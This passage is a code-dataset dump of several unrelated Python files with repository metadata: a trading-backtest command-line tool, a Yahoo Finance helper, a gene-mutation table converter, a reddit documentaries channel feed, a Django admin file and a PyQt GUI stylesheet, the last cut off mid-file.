hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d32eef8a7dfcf28dbfc6929775c3f28b6adb0ef8 | 4,879 | py | Python | app/main.py | DataScienceHobbyGroup/nacho-b | e4cfc62f2daa45cb939bb544491cdb1c1a7294ef | [
"MIT"
] | null | null | null | app/main.py | DataScienceHobbyGroup/nacho-b | e4cfc62f2daa45cb939bb544491cdb1c1a7294ef | [
"MIT"
] | 1 | 2021-04-30T22:09:21.000Z | 2021-04-30T22:09:21.000Z | app/main.py | DataScienceHobbyGroup/nacho-b | e4cfc62f2daa45cb939bb544491cdb1c1a7294ef | [
"MIT"
] | null | null | null | """TODO: Add file description."""
import curio # async library
import logging # python standard logging library
import click # command line interface creation kit (click)
import click_log # connects the logger output to click output
from datasources.binance_csv import BinanceCSV
from datasources.binance_api import binance_api
from strategies.moving_average import moving_average
from strategies.dca import DCA
from exchanges.fake_exchange import FakeExchange
# Log to both a per-run file (truncated on each start, mode='w') and the
# console; the format uses str.format-style placeholders (style='{').
logging.basicConfig(
    format='{asctime} - {name}: {levelname} $ {msg}',
    style='{',
    level=logging.INFO,
    handlers=[
        logging.FileHandler("last_run.log", mode='w'),
        logging.StreamHandler()
    ]
)
logger = logging.getLogger(__name__)
# Hook this logger into click's output handling (colours, -v option support).
click_log.basic_config(logger)
LOGO = '''
__ __
____ ____ ______/ /_ ____ / /_ ____ _____ ____ _____ ____ _
/ __ \/ __ `/ ___/ __ \/ __ \______/ __ \/ __ `/ __ \/ __ `/ __ \/ __ `/
/ / / / /_/ / /__/ / / / /_/ /_____/ /_/ / /_/ / / / / /_/ / / / / /_/ /
/_/ /_/\__,_/\___/_/ /_/\____/ /_.___/\__,_/_/ /_/\__,_/_/ /_/\__,_/
''' # noqa: E501, W291, W605
# These 3 dicts match the strings passed in to the command lines to the
# program modules. There is probably a cleaner/better way of achieving
# this, but this works for now.
strategy_dict = {
    "moving_average": moving_average,
    "dca": DCA,
}
exchange_dict = {
    "fake_exchange": FakeExchange,
}
datasource_dict = {
    "binance_csv": BinanceCSV,
    "binance_api": binance_api,
}
@click.command()
@click.option(
    '--strategy',
    help='Which strategy to use',
    type=click.Choice(strategy_dict.keys(), case_sensitive=False)
)
@click.option(
    '--strategy_params',
    help='The parameters for the strategy, as a comma-separated list'
)
@click.option(
    '--exchange',
    help='Which exchange to use',
    type=click.Choice(exchange_dict.keys())
)
@click.option(
    '--datasource',
    help='Which data source class to use',
    type=click.Choice(list(datasource_dict.keys()))
)
@click.option(
    '--datasource_path',
    help='The path to the datasource csv or api endpoint',
    type=click.Path(
        exists=True,
        file_okay=True,
        dir_okay=False,
        writable=False,
        readable=True,
        resolve_path=False,
        allow_dash=True,
        path_type=str
    ),
    required=False
)
@click_log.simple_verbosity_option(logger)
def backtest(strategy, strategy_params, exchange, datasource, datasource_path):
    """Run a backtest of STRATEGY on DATASOURCE against EXCHANGE.

    Looks the option strings up in the module-level dicts and hands the
    resulting classes to the backtest runner under curio.
    """
    if any(
        [
            strategy is None,
            strategy_params is None,
            exchange is None,
            datasource is None
        ]
    ):
        click.echo(
            (
                'Argument error. Run main.py backtest --help for info on the '
                'arguments'
            )
        )
        # BUG FIX: previously execution fell through here with the missing
        # options still None, raising KeyError on the dict lookups below.
        return
    # We don't need to handle the case of these assignments failing because
    # validation is handled for us by click
    # TODO: --datasource_path is required for some strategies but not others
    #  - not sure how to get this working properly in click.
    strategy_object = strategy_dict[strategy]
    exchange_object = exchange_dict[exchange]
    datasrce_object = datasource_dict[datasource]

    from backtest import backtest_runner as bt
    curio.run(
        bt.run, strategy_object, exchange_object, datasrce_object,
        strategy_params, datasource_path
    )
# output_ddca = strategy_ddca.run('app/strategies/ddca.ini')
@click.command()
@click.option('--strategy', help='Which strategy to use')
@click.option(
    '--strategy_params',
    help='The parameters for the strategy, as a comma-separated list'
)
@click.option('--exchange', help='Which exchange to use')
@click.option('--datasource', help='Which data source class to use')
def connect_to_api(strategy, strategy_params, exchange, datasource):
    """Placeholder for live trading against an exchange API.

    Currently accepts the options but only logs a message; no trading
    logic is implemented yet.
    """
    logger.info((
        "This is where in the future we will connect to a live api and run "
        "the strategy indefinitely."
    ))
@click.command()
@click.option('--strategy', help='Which strategy to use')
@click.option('--datasource', help='Which data source class to use')
@click.option(
    '--datasource_path',
    help='The path to the datasource csv (if applicable)'
)
def optimise(strategy, datasource, datasource_path):
    """Placeholder for strategy parameter optimisation.

    Currently accepts the options but only logs a message; no training
    algorithm is implemented yet.
    """
    logger.info((
        "This is where in the future we will run a training algorithm to "
        "optimise the params of the strategy"
    ))
# Register the CLI commands
@click.group()
def cli():
    """Root command group; subcommands are attached via add_command below."""
    pass
# Attach the subcommands to the root group.
cli.add_command(backtest)
cli.add_command(connect_to_api)
cli.add_command(optimise)
# Entrypoint: print the banner, then hand control to click.
if __name__ == '__main__':
    logger.info(LOGO)
    cli()
| 29.215569 | 79 | 0.644189 | 0 | 0 | 0 | 0 | 3,072 | 0.629637 | 0 | 0 | 2,207 | 0.452347 |
d32efdf87fa01cecf781b9df68da523858dc7395 | 446 | py | Python | github/joeynmt/vizseq/__init__.py | shania3322/joeynmt | 5afe9d00930f19949b2078141771bf4621f6e9ae | [
"Apache-2.0"
] | null | null | null | github/joeynmt/vizseq/__init__.py | shania3322/joeynmt | 5afe9d00930f19949b2078141771bf4621f6e9ae | [
"Apache-2.0"
] | null | null | null | github/joeynmt/vizseq/__init__.py | shania3322/joeynmt | 5afe9d00930f19949b2078141771bf4621f6e9ae | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
import os.path as op
from pathlib import Path
# Directory containing this package (the VERSION file lives next to it).
FILE_ROOT = Path(__file__).parent
# The package version is read verbatim from the bundled VERSION file.
with open(op.join(FILE_ROOT, 'VERSION')) as f:
    __version__ = f.read()
# Re-export the notebook helpers at package level; fairseq_viz is aliased.
from vizseq.ipynb import *
from vizseq.ipynb import fairseq_viz as fairseq
| 26.235294 | 62 | 0.724215 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 207 | 0.464126 |
d32f5b9d04aa58bad6be7d58f09474c29bae63fc | 428 | py | Python | invest_app/investlib/yfhelper.py | bdastur/builder | e05c013d01c4e82340879289940b3029fc6de266 | [
"Apache-2.0"
] | null | null | null | invest_app/investlib/yfhelper.py | bdastur/builder | e05c013d01c4e82340879289940b3029fc6de266 | [
"Apache-2.0"
] | null | null | null | invest_app/investlib/yfhelper.py | bdastur/builder | e05c013d01c4e82340879289940b3029fc6de266 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import yahoofinancials
def get_historical_price_data(ticker_symbol,
                              start_date, end_date,
                              frequency='weekly'):
    '''
    Return historical price data for *ticker_symbol*.

    Queries Yahoo Financials between start_date and end_date at the
    requested frequency (default weekly) and returns the raw response.
    '''
    client = yahoofinancials.YahooFinancials(ticker_symbol)
    return client.get_historical_price_data(start_date, end_date, frequency)
| 22.526316 | 72 | 0.619159 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 106 | 0.247664 |
d32f8561b61fe41f696c13c35bb0725c59749044 | 601 | py | Python | tools/HGMD/access_HGMDdb.py | NickyPan/bio_informatics | 2542b2888f6bdf684727622fbe9e073bc2ef61c8 | [
"Apache-2.0"
] | 1 | 2019-02-28T05:17:00.000Z | 2019-02-28T05:17:00.000Z | tools/HGMD/access_HGMDdb.py | NickyPan/bio_informatics | 2542b2888f6bdf684727622fbe9e073bc2ef61c8 | [
"Apache-2.0"
] | null | null | null | tools/HGMD/access_HGMDdb.py | NickyPan/bio_informatics | 2542b2888f6bdf684727622fbe9e073bc2ef61c8 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import os
import sys
# Convert the HGMD "allmut" dump into a tab-separated table, reordering
# columns and turning the PubMed id into a full URL.
dbSet = []
with open('other_allmut_HD.txt', "r") as beds:
    for bed in beds:
        fields = bed.strip().split('\t')
        item = '\t'.join([
            fields[15], fields[16], fields[17], fields[17], fields[17],
            fields[17],
            'https://www.ncbi.nlm.nih.gov/pubmed/' + fields[26],
            fields[18], fields[17], fields[1], fields[13], fields[11],
            fields[14], fields[0],
        ])
        dbSet.append(item)
# NOTE: the original also called beds.close() after the with-block; the
# context manager already closes the file, so that redundant call is gone.
result = '\n'.join(dbSet)
with open('dbset.txt', "w") as text_file:
    text_file.write(result)
d32fadd4ff7f6437fb1ebe111930355e7c14cd81 | 5,058 | py | Python | home/pi/blissflixx/chls/bfch_r_documentaries/__init__.py | erick-guerra/Royalbox | 967dbbdddc94b9968e6eba873f0d20328fd86f66 | [
"MIT"
] | 1 | 2022-01-29T11:17:58.000Z | 2022-01-29T11:17:58.000Z | home/pi/blissflixx/chls/bfch_r_documentaries/__init__.py | erick-guerra/Royalbox | 967dbbdddc94b9968e6eba873f0d20328fd86f66 | [
"MIT"
] | null | null | null | home/pi/blissflixx/chls/bfch_r_documentaries/__init__.py | erick-guerra/Royalbox | 967dbbdddc94b9968e6eba873f0d20328fd86f66 | [
"MIT"
] | null | null | null | import chanutils.reddit
_SUBREDDIT = 'Documentaries'
_FEEDLIST = [
{'title':'Latest', 'url':'http://www.reddit.com/r/Documentaries.json'},
{'title':'Anthropology', 'url':'http://www.reddit.com/r/documentaries/search.json?q=flair%3A%27Anthropology%27&sort=top&restrict_sr=on&t=all'},
{'title':'Art', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Art%27&sort=top&restrict_sr=on&t=all'},
{'title':'Biography', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Biography%27&sort=top&restrict_sr=on&t=all'},
{'title':'Crime', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Crime%27&sort=top&restrict_sr=on&t=all'},
{'title':'Cusine', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Cuisine%27&sort=top&restrict_sr=on&t=all'},
{'title':'Disaster', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Disaster%27&sort=top&restrict_sr=on&t=all'},
{'title':'Drugs', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Drugs%27&sort=top&restrict_sr=on&t=all'},
{'title':'Economics', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Economics%27&sort=top&restrict_sr=on&t=all'},
{'title':'History', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27History%27&sort=top&restrict_sr=on&t=all'},
{'title':'History (Ancient)', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Ancient+hist%27&sort=top&restrict_sr=on&t=all'},
{'title':'History (20th Century)', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%2720th+century%27&sort=top&restrict_sr=on&t=all'},
{'title':'Intelligence', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Intelligence%27&sort=top&restrict_sr=on&t=all'},
{'title':'Literature', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Literature%27&sort=top&restrict_sr=on&t=all'},
{'title':'Medicine', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Medicine%27&sort=top&restrict_sr=on&t=all'},
{'title':'Music', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Music%27&sort=top&restrict_sr=on&t=all'},
{'title':'Nature', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Nature%27&sort=top&restrict_sr=on&t=all'},
{'title':'Offbeat', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Offbeat%27&sort=top&restrict_sr=on&t=all'},
{'title':'American Politics', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27American+politics%27&sort=top&restrict_sr=on&t=all'},
{'title':'International Politics', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Int+politics%27&sort=top&restrict_sr=on&t=all'},
{'title':'Psychology', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Psychology%27&sort=top&restrict_sr=on&t=all'},
{'title':'Religion', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Religion%27&sort=top&restrict_sr=on&t=all'},
{'title':'Science', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Science%27&sort=top&restrict_sr=on&t=all'},
{'title':'Sex', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Sex%27&sort=top&restrict_sr=on&t=all'},
{'title':'Sport', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Sport%27&sort=top&restrict_sr=on&t=all'},
{'title':'Tech/Internet', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Tech%27&sort=top&restrict_sr=on&t=all'},
{'title':'Travel', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Travel%27&sort=top&restrict_sr=on&t=all'},
{'title':'War', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27War%27&sort=top&restrict_sr=on&t=all'},
{'title':'World War 1', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27WW1%27&sort=top&restrict_sr=on&t=all'},
{'title':'World War 2', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27WW2%27&sort=top&restrict_sr=on&t=all'},
{'title':'Vietnam War', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Vietnam+conflict%27&sort=top&restrict_sr=on&t=all'},
{'title':'Afghanistan War', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Afghanistan+conflict%27&sort=top&restrict_sr=on&t=all'},
{'title':'Iraq War', 'url':'http://www.reddit.com/r/Documentaries/search.json?q=flair%3A%27Iraq+conflict%27&sort=top&restrict_sr=on&t=all'},
]
def name():
  """Return the display name of this channel."""
  return 'Documentaries'
def image():
  """Return the filename of the channel icon."""
  return "icon.png"
def description():
  """Return the HTML channel description shown in the UI."""
  return "Assorted Documentaries Channel for /r/Documentaries subreddit (<a target='_blank' href='http://www.reddit.com/r/Documentaries'>http://www.reddit.com/r/Documentaries</a>)."
def feedlist():
  """Return the module-level list of feed definitions."""
  return _FEEDLIST
def feed(idx):
  """Fetch and return the reddit feed at index *idx* of the feed list."""
  entry = _FEEDLIST[idx]
  return chanutils.reddit.get_feed(entry)
def search(q):
  """Search the channel's subreddit for query *q*."""
  subreddit = _SUBREDDIT
  return chanutils.reddit.search(subreddit, q)
| 87.206897 | 181 | 0.723013 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,428 | 0.875445 |
d330b0abc9b07d9ac27539db5194ff38a79da742 | 73 | py | Python | python/__init__.py | SpM-lab/irbasis | 5beb5cbe3c0ba0fb42c32e262f04d1f3359d6045 | [
"MIT"
] | 17 | 2018-07-16T15:07:09.000Z | 2022-03-26T06:46:55.000Z | python/__init__.py | SpM-lab/irbasis | 5beb5cbe3c0ba0fb42c32e262f04d1f3359d6045 | [
"MIT"
] | 3 | 2019-09-19T07:12:01.000Z | 2020-02-14T11:54:03.000Z | python/__init__.py | SpM-lab/irbasis | 5beb5cbe3c0ba0fb42c32e262f04d1f3359d6045 | [
"MIT"
] | 6 | 2019-01-28T19:51:50.000Z | 2021-08-02T12:57:14.000Z | from .irbasis import load, basis, sampling_points_matsubara, __version__
| 36.5 | 72 | 0.849315 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d331cf8fdbde34709011fa6dbc66e215380c30c3 | 4,650 | py | Python | src/bake_a_py/cli.py | derSuessmann/bake-a-py | 1fd2a0a4fa473215b44d2718755c5994a5588343 | [
"MIT"
] | null | null | null | src/bake_a_py/cli.py | derSuessmann/bake-a-py | 1fd2a0a4fa473215b44d2718755c5994a5588343 | [
"MIT"
] | null | null | null | src/bake_a_py/cli.py | derSuessmann/bake-a-py | 1fd2a0a4fa473215b44d2718755c5994a5588343 | [
"MIT"
] | null | null | null | import sys
import traceback
import click
from . import imaging_utility as iu
from . import provisioning
from . import __version__
def eprint(msg, show):
    """Print *msg* on stderr; when *show* is true, print the current
    exception traceback first, followed by a blank separator line."""
    if show:
        traceback.print_exc()
        print(file=sys.stderr)  # blank line between traceback and message
    click.echo(msg, file=sys.stderr)
@click.group()
@click.version_option(__version__)
@click.option('--traceback', is_flag=True,
    help='Show the full python exception if an error occurs.')
@click.pass_context
def cli(ctx, traceback):
    """Root command group; stores the --traceback flag on the click
    context so subcommands can pass it to eprint()."""
    ctx.ensure_object(dict)
    ctx.obj['TRACEBACK'] = traceback
@cli.command()
@click.option('--hidden/--plain', default=True,
    help='Hide or show password input.')
@click.pass_context
def create(ctx, hidden):
    """Create a provisioning configuration.

    Delegates to provisioning.create(); *hidden* controls password-input
    visibility.
    """
    try:
        provisioning.create(hidden)
    except Exception as exc:
        # Traceback is only shown when the top-level --traceback flag was set.
        eprint(f'Creating provisioning configuration failed ({exc}).',
               ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('os')
@click.option('--image-cache',
    type=click.Path(file_okay=False),
    default='~/.cache/bake-a-py',
    help='Path where the downloaded image is stored.')
@click.option('-o', '--output',
    help='Device path to write the OS image to.')
@click.option('--chksum/--no-chksum', '-c/ ', default=False,
    help='Check the checksum of the OS image before writing.')
@click.option('--target', '-t',
    help='Name of the configuration file.')
@click.option('--become', '-b', is_flag=True,
    help='Run the writing of the image as super user.')
@click.option('--remove', '-r', is_flag=True,
    help='Remove the image file after writing.')
@click.option('--keep', '-k', is_flag=True,
    help='Keep the downloaded archive.')
@click.option('--encrypted/--decrypted', ' /-d', default=True,
    help='Force usage of encrypted or decrypted provisioning configuration.')
@click.pass_context
def write(ctx, os, image_cache, output, chksum, target, become, remove, keep,
        encrypted):
    """Write the image.

    OS is the image name (one of the results of the list command).
    This command download, extracts, checks integrity, writes and provisions
    if neccessary.
    """
    try:
        # All the heavy lifting happens in the imaging utility module.
        iu.write(os, image_cache, output, target, chksum, become, remove, keep,
                 encrypted)
    except Exception as exc:
        eprint(f'Writing failed ({exc}).',
               ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('target')
@click.option('-o', '--output',
    help='Device path to write the OS image to.')
@click.option('--encrypted/--decrypted', ' /-d', default=True,
    help='Force usage of encrypted or decrypted provisioning configuration.')
@click.pass_context
def provision(ctx, target, output, encrypted):
    """Provision the os on OUTPUT for TARGET.

    TARGET is the name of the configuration file. Delegates to
    iu.provision(); errors are reported via eprint.
    """
    try:
        iu.provision(target, output, encrypted)
    except Exception as exc:
        eprint(f'Provisioning failed ({exc}).',
               ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('device')
@click.pass_context
def mount(ctx, device):
    """Mount all partitions on DEVICE (via the udisks2 wrapper)."""
    try:
        iu.udisks2.mount(device)
    except Exception as exc:
        eprint(f'Mounting {device} failed ({exc}).',
               ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('device')
@click.pass_context
def unmount(ctx, device):
    """Unmount all partitions on DEVICE (via the udisks2 wrapper)."""
    try:
        iu.udisks2.unmount(device)
    except Exception as exc:
        eprint(f'Unmounting {device} failed ({exc}).',
               ctx.obj['TRACEBACK'])
@cli.command()
@click.option('-a', '--all', is_flag=True,
    help='All available images (not only Raspberry Pi OS images).')
@click.pass_context
def list(ctx, all):
    # NOTE(review): the parameter names shadow the builtins `list`/`all`;
    # they are part of the CLI mapping, so they are left unchanged here.
    """List available OS images, one per line."""
    try:
        if all:
            result = iu.get_all_images()
        else:
            result = iu.get_raspios_flavors()
        click.echo('\n'.join(result))
    except Exception as exc:
        eprint(f'Listing OS images failed ({exc}).',
               ctx.obj['TRACEBACK'])
@cli.command()
@click.option('--verbose', '-v', is_flag=True,
    help='Show the complete description of the os image.')
@click.argument('name')
@click.pass_context
def describe(ctx, name, verbose):
    """Display the description of the OS image NAME.

    With --verbose the full metadata mapping is printed; otherwise only
    its 'description' field.
    """
    try:
        desc = iu.get_image_description(name)
        if verbose:
            click.echo(desc)
        else:
            click.echo(desc['description'])
    except Exception as exc:
        eprint(f'Displaying description of {name} failed ({exc}).',
               ctx.obj['TRACEBACK'])
# Entrypoint: start with an empty context object (filled in by the cli group).
if __name__ == '__main__':
    cli(obj={})
d331d81afce0ba8cb722312a7186ad3036859de6 | 1,338 | py | Python | utility/gd_content.py | SoftBlankie/dsa-twitter-bot | 9d251ab0e3a89b38696bf667421eba0f49923033 | [
"MIT",
"Unlicense"
] | null | null | null | utility/gd_content.py | SoftBlankie/dsa-twitter-bot | 9d251ab0e3a89b38696bf667421eba0f49923033 | [
"MIT",
"Unlicense"
] | null | null | null | utility/gd_content.py | SoftBlankie/dsa-twitter-bot | 9d251ab0e3a89b38696bf667421eba0f49923033 | [
"MIT",
"Unlicense"
] | null | null | null | def read_paragraph_element(element):
"""Returns text in given ParagraphElement
Args:
element: ParagraphElement from Google Doc
"""
text_run = element.get('textRun')
if not text_run:
return ''
return text_run.get('content')
def read_structural_elements(elements):
    """Recurse through a list of Structural Elements and collect the
    document's text, which may be nested in paragraphs, tables, or a
    table of contents.

    Args:
        elements: list of Structural Elements.

    Returns:
        The concatenated text of all nested elements.
    """
    text = ''
    for value in elements:
        if 'paragraph' in value:
            # Note: no longer rebinds the `elements` parameter as the
            # original did.
            for elem in value.get('paragraph').get('elements'):
                text += read_paragraph_element(elem)
        elif 'table' in value:
            # Text in table cells is in nested Structural Elements,
            # and tables may themselves be nested.
            for row in value.get('table').get('tableRows'):
                for cell in row.get('tableCells'):
                    # BUG FIX: was `read_strucutural_elements` (undefined
                    # name, NameError on any table).
                    text += read_structural_elements(cell.get('content'))
        elif 'tableOfContents' in value:
            # Text in a TOC is also wrapped in Structural Elements.
            # BUG FIX: same undefined-name typo as above.
            toc = value.get('tableOfContents')
            text += read_structural_elements(toc.get('content'))
    return text
d33381d94db212c012354ecf16f4b8a33084a29c | 301 | py | Python | SchoolManagement/ServerRestAPI/admin.py | amiremohamadi/django-restful-api | 13dd5de4f16b5529556118a3469680c42e6e8c42 | [
"MIT"
] | 4 | 2019-05-26T18:08:44.000Z | 2019-07-05T10:45:24.000Z | SchoolManagement/ServerRestAPI/admin.py | amiremohamadi/django-restful-api | 13dd5de4f16b5529556118a3469680c42e6e8c42 | [
"MIT"
] | null | null | null | SchoolManagement/ServerRestAPI/admin.py | amiremohamadi/django-restful-api | 13dd5de4f16b5529556118a3469680c42e6e8c42 | [
"MIT"
] | 2 | 2020-05-31T20:38:59.000Z | 2020-10-07T11:16:52.000Z | from django.contrib import admin
from ServerRestAPI.models import (
Student, Teacher, StudentLecture,
TeacherLecture, Lecture
)
admin.site.register(Student)
admin.site.register(Teacher)
admin.site.register(StudentLecture)
admin.site.register(TeacherLecture)
admin.site.register(Lecture) | 25.083333 | 38 | 0.797342 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d33385aee0f5219d0cc15a664efa5cd3ff7a8758 | 352 | py | Python | BOJ/17000~17999/17200~17299/17286.py | shinkeonkim/today-ps | f3e5e38c5215f19579bb0422f303a9c18c626afa | [
"Apache-2.0"
] | 2 | 2020-01-29T06:54:41.000Z | 2021-11-07T13:23:27.000Z | BOJ/17000~17999/17200~17299/17286.py | shinkeonkim/Today_PS | bb0cda0ee1b9c57e1cfa38355e29d0f1c6167a44 | [
"Apache-2.0"
] | null | null | null | BOJ/17000~17999/17200~17299/17286.py | shinkeonkim/Today_PS | bb0cda0ee1b9c57e1cfa38355e29d0f1c6167a44 | [
"Apache-2.0"
] | null | null | null | import itertools,math
L = [1,2,3]
p = list(itertools.permutations(L,3))
D = [list(map(int,input().split())) for i in range(4)]
ans = 999999999999
for pp in p:
k = [0]+list(pp)
d = 0
for i in range(1,4):
d += math.sqrt((D[k[i-1]][0] - D[k[i]][0])**2 + (D[k[i-1]][1] - D[k[i]][1])**2)
if d < ans:
ans = d
print(int(ans)) | 23.466667 | 87 | 0.511364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d3356a95eb136cde9fb2ff5f5c78c32c6a43c33c | 7,264 | py | Python | scellseg/guis/scellsegGui.py | cellimnet/scellseg-publish | 03bfbae11fedcf430c40419c9afadf55cbd3034d | [
"BSD-3-Clause"
] | 1 | 2022-03-04T01:55:40.000Z | 2022-03-04T01:55:40.000Z | scellseg/guis/scellsegGui.py | cellimnet/scellseg-publish | 03bfbae11fedcf430c40419c9afadf55cbd3034d | [
"BSD-3-Clause"
] | null | null | null | scellseg/guis/scellsegGui.py | cellimnet/scellseg-publish | 03bfbae11fedcf430c40419c9afadf55cbd3034d | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'cellPoseUI.ui'
# Created by: PyQt5 UI code generator 5.11.3
import os, platform, ctypes, sys
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFontDatabase
from scellseg.guis.scellsegUi import Ui_MainWindow
class scellsegGui(Ui_MainWindow):
    """Main application window: builds the generated Ui_MainWindow layout,
    tunes the splitters, and confirms before closing."""

    def __init__(self, image=None, parent=None):
        super(scellsegGui, self).__init__(parent)
        self.setupUi(self)
        # Give the left pane more room than the right one by default.
        self.splitter.setSizes([500, 250])
        # Enable hover styling on both splitter grips.
        for grip in (self.splitter.handle(1), self.splitter2.handle(1)):
            grip.setAttribute(Qt.WA_Hover, True)

    def closeEvent(self, event):
        """Ask the user to confirm before the window is closed."""
        choice = QtWidgets.QMessageBox.question(
            self, 'Close', 'Close Scellseg',
            QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,
            QtWidgets.QMessageBox.No)
        if choice == QtWidgets.QMessageBox.Yes:
            event.accept()
        elif choice == QtWidgets.QMessageBox.No:
            event.ignore()
def start_gui():
    """Create the QApplication, apply the Scellseg stylesheet, show the
    main window, and run the Qt event loop (blocks until exit)."""
    # Palette used throughout the stylesheet below. Unused colour locals
    # from the original (SliderColor, BlackColor, BtnColor) were removed.
    Translucent = 'rgba(255,255,255,0)'
    Primary = '#fafafa'
    PrimaryLight = '#C0C0C0'
    ListColor = '#F0F0F0'
    LabelColor = '#7A581E'
    Secondary = '#D3D3D3'
    SecondaryLight = '#D3D3D3'
    SecondaryDark = '#D3D3D3'
    SecondaryText = '#000000'
    # Qt stylesheets need forward slashes in url() even on Windows.
    border_image_path = os.path.dirname(os.path.abspath(__file__)).replace('\\', '/') + '/assets/slider_handle.png'
    sheet = [
        'QWidget',
        '{',
        'outline: 0;',
        'font: 11pt "文泉驿微米黑";',
        'selection-color: {0:s};'.format(SecondaryText),
        'selection-background-color: {0:s};'.format(Secondary),
        ' } ',
        'QSlider::handle:horizontal#rangeslider'
        '{',
        'border-image: url({0:s});'.format(border_image_path),
        '}',
        'QLabel#label_seg',
        '{',
        'color: {0:s};'.format(LabelColor),
        'font: bold 18px "Arial"',
        '}',
        'QLabel#label_batchseg',
        '{',
        'color: {0:s};'.format(LabelColor),
        'font: bold 18px "Arial"',
        '}',
        'QLabel#label_getsingle',
        '{',
        'color: {0:s};'.format(LabelColor),
        'font: bold 18px "Arial"',
        '}',
        'QSplitter::handle:horizontal',
        '{',
        'width: 10px;',
        '}',
        'QSplitter::handle:vertical',
        '{',
        'height: 10px;',
        '}',
        'QSplitter::handle',
        '{',
        'background-color: {0:s};'.format(Translucent),
        '}',
        'QSplitter::handle:hover',
        '{',
        'background-color: {0:s};'.format(Secondary),
        '}',
        'QSplitter::handle:pressed',
        '{',
        'background-color: {0:s};'.format(Secondary),
        '}',
        'QTableView',
        '{',
        'background-color: {0:s};'.format(ListColor),
        'border-style: none;',
        '}',
        'QHeaderView',
        '{',
        'background-color: {0:s};'.format(Translucent),
        'border-bottom: 2px solid #505050',
        '}',
        'QHeaderView::section',
        '{',
        'background-color: {0:s};'.format(Translucent),
        'border-bottom: 2px solid #505050',
        '}',
        'QMenuBar',
        '{',
        'background-color: {0:s};'.format(Primary),
        'border-width: 1px;',
        'border-style: none;',
